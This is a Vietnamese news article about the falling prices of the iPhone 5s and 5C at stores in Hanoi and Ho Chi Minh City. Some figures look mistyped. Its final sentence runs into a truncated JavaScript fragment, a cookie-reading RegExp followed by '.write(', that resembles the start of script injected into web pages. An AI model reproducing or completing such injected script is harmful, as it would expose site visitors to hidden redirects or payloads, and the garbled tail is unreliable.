iPhone 5s bất ngờ giảm giá bán

Sau một thời gian “làm mưa làm gió” trên thị trường smartphone Việt Nam, giá bán iPhone 5s và iPhone 5C giờ đây đã trở lại ở mức giá thực tế và dự kiến giá bán của bộ đôi sản phẩm này sẽ còn giảm trong thời gian tới đây, khi các sản phẩm được phân phối qua các nhà mạng.

Giá iPhone mới giảm xuống

Tương tự như các phiên bản iPhone trước đây khi mới được lên kệ và xuất hiện trên thị trường tự do, iPhone 5s và iPhone 5C cũng được các cửa hàng kinh doanh, buôn bán điện thoại đưa ra mức giá bán cao hơn rất nhiều so với mức giá thực tế. Theo đó, khi mới xuất hiện tại Việt Nam, giá bán iPhone 5s dao động từ 23 – 25 triệu đồng cho phiên bản 16GB, đối với phiên bản iPhone 5s màu vàng thì giá bán của nó còn lên tới 35 – 40 triệu đồng, vì đây là một màu mới xuất hiện của chiếc iPhone mới.

Giá iPhone 5s và iPhone 5C tại Điện thoại độc đã giảm xuống

Sau hơn một tháng “làm mưa làm gió” trên thị trường, hiện tại mức giá bán của iPhone 5S và iPhone 5C đã giảm sâu và sát với mức giá thực tế hơn.

Tham  khảo giá bán tại cửa hàng Điện thoại độc (Hà Nội), hiện iPhone 5s phiên bản màu vàng có giá 17,9 triệu đồng cho bản ổ cứng 16GB, iPhone 5s màu đen phiên bản 16GB có giá 16,5 triệu đồng, còn đối với phiên bản 32GB màu trắng có giá 18,5 triệu đồng.

Tại TP HCM, cửa hàng MuabaniPhone thì giá iPhone 5s đã giảm mạnh, phiên bản màu đen 16GB có giá 16,5 triệu đồng, phiên bản 32GB giá 19,1 triệu đồng và bản 64GB có giá 20,6 triệu đồng. Đối với phiên bản màu vàng cũng giảm mạnh theo, phiên bản 16GB có giá 18.1 triệu đồng, 2 phiên bản 32GB và 64GB có giá lần lượt là 21,4 triệu đồng và 22,5 triệu đồng.

Tại một số cửa hàng kinh doanh các thiết bị công nghệ lớn và uy tín ở Hà Nội và TP HCM cũng đã điều chỉnh lại bức giá của 5s theo chiều hướng giảm mạnh so với thời điểm khi sản phẩm mới xuất hiện.

Nhìn chung, hiện nay mức giá của 5s đã giảm mạnh và mức chênh lệch giữa các phiên bản là không nhiều, vì vậy người dùng sẽ có sự đắn đo khi đi mua hàng.

Có rất nhiều lý do giải thích cho sự sụt giá này. Đầu tiên, chính là phản ứng của thị trường với chiếc smartphone đầu bảng này. Khi mà giờ đây, trên thị trường người dùng có rất nhiều sự lựa chọn hơn, họ sẵn sàng đợi để sản phẩm iPhone giảm giá, còn hơn là phải bỏ ra một số tiền lớn để sớm sở hữu chiếc iPhone cao cấp này.

Ngoài ra, với việc iPhone 5s đã “đổ bộ” lên 51 quốc gia mới vào đầu tháng 10 vừa qua, trong đó có các quốc gia gần với Việt Nam như Đài Loan, Thái Lan, Macao đã khiến cho nguồn hàng không còn khan hiếm như ngày xưa nữa.

Giá iPhone 5 ít dao động

Giá bán của bộ đôi iPhone mới sẽ giữ nguyên cho đến khi các nhà mạng phân phối chính hãng

Không chỉ riêng mình chiếc iPhone cao cấp, mà chiếc iPhone vỏ nhựa cũng phải chịu chung số phận, cũng giảm giá mạnh tại thị trường nước ta.

Tham khảo mức giá iPhone 5C tại một số cửa hàng cho thấy chiếc smartphone này có giá dao động từ 11,5 – 1 triệu đồng cho bản 12GB. Thậm chí, giá của 5C còn thấp hơn mức giá iPhone 5 trên thị trường, đây vốn là một phiên bản đã bị Apple “khai tử” để mở đường cho chiếc iPhone vỏ nhựa. Hiện giá iPhone 5 dao động từ 13 – 15 triệu đồng cho bản 16GB.

Việc iPhone 5C nhanh chóng trượt giá tại thị trường Việt Nam là một điều đã được dự đoán từ trước đó, nhất là khi sản phẩm được trang bị một lớp vỏ nhựa đã khiến người dùng thực sự rất thất vọng.

Theo dự đoán của nhiều chủ cửa hàng kinh doanh điện thoại di động, giá iPhone 5s và iPhone 5C sẽ giữ nguyên ở thời điểm hiện tại và nó chỉ sẽ thay đổi khi các nhà mạng tại Việt Nam chính thức phân phối cả 2 sản phẩm này. Trong khi đó, mức giá iPhone 5 gần như đã đóng băng, bởi do Apple đã ngừng sản xuất phiên bản này, vì vậy giới kinh doanh sẽ giữ nguyên mức giá của sản phẩm cho đến khi hết hàng. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘